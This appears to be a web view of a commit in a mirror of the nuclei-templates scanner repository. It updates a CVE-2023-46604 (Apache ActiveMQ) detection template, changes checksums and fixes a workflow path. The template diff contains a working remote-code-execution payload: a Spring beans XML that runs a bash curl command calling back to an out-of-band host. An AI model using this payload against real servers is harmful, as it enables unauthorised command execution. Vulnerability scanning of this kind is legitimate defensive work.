daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into pussycat0x-patch-6

patch-1
Dhiyaneshwaran 2024-03-22 13:12:46 +05:30 committed by GitHub
parent 97d93e4e5a c37769da01
commit 8810e04533
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 8 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
javascript/cves/2023/CVE-2023-46604.yaml
View File

@ -40,7 +40,7 @@ javascript:
let b = m2.Buffer();
let name=Host+':'+Port;
let conn = m1.Open('tcp', name);
let randomvar = '{{randstr}}'
let randomvar = '{{randstr}}'.toLowerCase();
var Base64={encode: btoa}
exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
@ -61,4 +61,4 @@ javascript:
- 'contains(interactsh_protocol, "dns")'
- 'contains(interactsh_request, response)'
condition: and
# digest: 4a0a004730450220072242f64d49392155c8bd39d873097b2d61c950543e6aed9e10de3504f6c99202210089c83d599670a33b43a312a55f6ef5dce55b3861aa538160fa40802c06d6a00f:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c9d0d2f9b39ad03129d83fcc2561733c1ffdb8119572c0f222d529083466f7b1022100b6db80c8ccd45b35ec5ebafceefbf53d92b365fc01041ad991036346155950c4:922c64590222798bb761d5b6d8e72950

8
templates-checksum.txt
View File

@ -5133,7 +5133,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3
http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7
http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f
http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057
http/misconfiguration/installer/drupal-install.yaml:8935c0e57b3677226b50338b8495600390d3e8b0
http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36
http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9
http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251
http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99
@ -7992,7 +7992,7 @@ http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380
http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b
javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0
javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb
javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8
javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625
javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3
javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161
javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad
@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
templates-checksum.txt:128d6f230562518d7dd61144f475986ae8d2e63c
templates-checksum.txt:85f803445c04e3767bca7543b712f870fbe8bc26
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
@ -8215,7 +8215,7 @@ workflows/concrete-workflow.yaml:9ce74c7f22e588fe67965f30608d5b4c2b63b97b
workflows/confluence-workflow.yaml:68fd7ea4f21d30bfb2898f6b714728dcf08c5fbc
workflows/dahua-workflow.yaml:2e6e287ca5c83229a03cc790fca31962ca0a8a1a
workflows/dedecms-workflow.yaml:c96c00339a55a8ede0578bdb8ae625b4b6d7e32d
workflows/default-application-workflow.yaml:07fe2d7545f5768661550d63536b0fe61f4433bb
workflows/default-application-workflow.yaml:df25752fc3cc808eaba4d365f2924744130db71a
workflows/dell-idrac-workflow.yaml:40a2853262007c7904c0ca6ceeff8116d2694139
workflows/dolibarr-workflow.yaml:36c2eaa9e3aabe24b61b95c7e451dae5f26939b5
workflows/dotnetnuke-workflow.yaml:8e2578065d576a59c30a807fab1913ae5726a779

3
workflows/default-application-workflow.yaml
View File

@ -4,6 +4,7 @@ info:
name: Default Web Application Detection
author: andydoering
description: Detects default installations of web applications
workflows:
- template: http/technologies/apache/default-apache-test-all.yaml
@ -23,7 +24,7 @@ workflows:
- template: http/technologies/default-django-page.yaml
- template: http/exposures/files/drupal-install.yaml
- template: http/misconfiguration/installer/drupal-install.yaml
- template: http/technologies/oracle/default-oracle-application-page.yaml